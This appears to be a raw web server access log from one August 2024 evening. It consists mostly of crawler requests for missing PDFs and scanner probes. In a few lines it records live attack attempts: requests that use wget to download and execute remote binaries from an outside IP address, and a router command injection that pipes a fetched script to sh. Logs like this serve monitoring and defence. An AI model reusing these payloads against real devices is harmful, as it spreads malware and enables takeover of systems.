156.59.198.135 - - [19/Aug/2024:18:53:09 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10252799.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:18:53:29 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11913511.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:18:55:57 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10371256.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:19:01:18 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10777615.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:19:06:36 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11890615.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:19:06:57 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10623587.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
88.214.25.62 - - [19/Aug/2024:19:08:53 +0200] "\x03" 400 383 "-" "-"
156.59.198.136 - - [19/Aug/2024:19:11:47 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12127028.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:19:12:08 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11724492.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.128.59 - - [19/Aug/2024:19:12:23 +0200] "GET /shell?cd+/tmp;rm+earm+earm7;nohup+wget+http:/\\/154.216.18.196/earm7;chmod+777+earm7;./earm7+jaws;nohup+wget+http:/\\/154.216.18.196/earm;chmod+777+earm;./earm+jaws HTTP/1.1" 404 280 "-" "KrebsOnSecurity"
156.59.198.135 - - [19/Aug/2024:19:12:29 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10426119.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:19:12:50 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12490704.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:19:13:11 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12040153.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:19:13:33 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12243541.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:19:13:54 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11201389.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:19:14:15 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10458802.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.138 - - [19/Aug/2024:19:14:28 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [19/Aug/2024:19:14:36 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11177722.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:19:14:58 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11723522.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:19:15:19 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11359308.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:19:15:40 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12269038.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.128.74 - - [19/Aug/2024:19:26:37 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [19/Aug/2024:19:40:42 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12251640.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:19:41:03 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12269119.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:19:41:24 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10790230.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:19:41:46 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10554175.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:19:42:28 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12202646.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:19:42:50 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11951610.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [19/Aug/2024:19:49:10 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.135 - - [19/Aug/2024:19:50:17 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11578722.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:19:50:38 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10605738.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:19:50:59 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11503844.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.50.7 - - [19/Aug/2024:19:51:20 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:19:53:48 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11449505.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.52.167 - - [19/Aug/2024:19:54:45 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [19/Aug/2024:20:00:52 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12491082.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:20:01:13 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11890637.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:20:04:15 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10711242.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:20:04:36 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11757467.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:20:04:57 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12333248.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:20:05:18 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11818721.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
94.141.241.31 - - [19/Aug/2024:20:05:48 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
156.59.198.136 - - [19/Aug/2024:20:14:48 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11133313.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:20:15:09 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11772768.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:20:15:30 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11811000.pdf HTTP/1.0" 404 317 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:20:15:52 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11884329.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:20:16:12 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11354032.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:20:16:34 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12113201.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:20:16:55 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12248816.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:20:35:39 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10349403.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:20:36:06 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12129653.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:20:36:27 +0200] "GET /renault.2web.at/htdocs/binaries/10267451.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:20:36:49 +0200] "GET /docs/contadino/2017/RE17-000028.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.128.83 - - [19/Aug/2024:20:38:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.18.196%2Ft%7Csh%3B%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [19/Aug/2024:20:46:35 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10762268.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:20:49:46 +0200] "GET /renault.activities.at/htdocs/pinEdit/editor/config/toolbar%20quick%20mode.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:20:50:07 +0200] "GET /docs/contadino/2017/RE17-000017.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.128.47 - - [19/Aug/2024:21:10:49 +0200] "GET / HTTP/1.0" 200 423 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
156.59.198.136 - - [19/Aug/2024:21:12:10 +0200] "GET /renault.2web.at/htdocs/binaries/10485654.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
91.92.254.180 - - [19/Aug/2024:21:13:43 +0200] "GET /index/CheckCert/checkCert HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
149.50.103.48 - - [19/Aug/2024:21:16:04 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [19/Aug/2024:21:35:13 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11184275.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.34.174 - - [19/Aug/2024:21:36:47 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:21:40:25 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10413398.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:21:40:47 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12226807.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:21:45:56 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12076083.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:21:46:17 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11228315.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:21:46:39 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10252974.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
35.242.167.202 - - [19/Aug/2024:21:47:46 +0200] "GET /upload.php HTTP/1.0" 404 351 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.3"
156.59.198.136 - - [19/Aug/2024:21:51:03 +0200] "GET /renault.2web.at/htdocs/binaries/10130681.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:21:54:12 +0200] "GET /renault.2web.at/htdocs/binaries/10130624.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:21:54:33 +0200] "GET /renault.2web.at/htdocs/binaries/10225293.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:21:54:54 +0200] "GET /renault.2web.at/htdocs/binaries/10661192.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:21:55:15 +0200] "GET /renault.2web.at/htdocs/binaries/10277440.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:21:55:59 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10957490.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:21:56:23 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10396391.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:22:05:05 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/10961232.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:22:38:37 +0200] "GET /renault.2web.at/htdocs/binaries/10225299.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
165.22.236.49 - - [19/Aug/2024:22:46:45 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
45.156.129.95 - - [19/Aug/2024:22:47:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
156.59.198.136 - - [19/Aug/2024:22:47:14 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12136315.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:22:49:01 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12387843.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:22:57:43 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12094883.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Aug/2024:22:58:05 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/11901431.pdf HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:22:58:26 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12466287.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.170.144.3 - - [19/Aug/2024:23:07:57 +0200] "\x03" 400 383 "-" "-"
156.59.198.136 - - [19/Aug/2024:23:08:07 +0200] "GET /renault.activities.at/htdocs/binaries/10008643.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:23:08:28 +0200] "GET /renault.2web.at/htdocs/binaries/10267576.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.97.54 - - [19/Aug/2024:23:15:14 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.128.59 - - [19/Aug/2024:23:29:40 +0200] "GET /shell?cd+/tmp;rm+earm+earm7;nohup+wget+http:/\\/154.216.18.196/earm7;chmod+777+earm7;./earm7+jaws;nohup+wget+http:/\\/154.216.18.196/earm;chmod+777+earm;./earm+jaws HTTP/1.1" 404 280 "-" "KrebsOnSecurity"
95.214.52.167 - - [19/Aug/2024:23:31:15 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [19/Aug/2024:23:35:56 +0200] "GET /docs/contadino/2017/RE17-000030.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Aug/2024:23:36:18 +0200] "GET /renault.2web.at/htdocs/export/pdf/emuc_document/12239524.pdf HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
146.148.124.15 - - [19/Aug/2024:23:36:23 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.2"
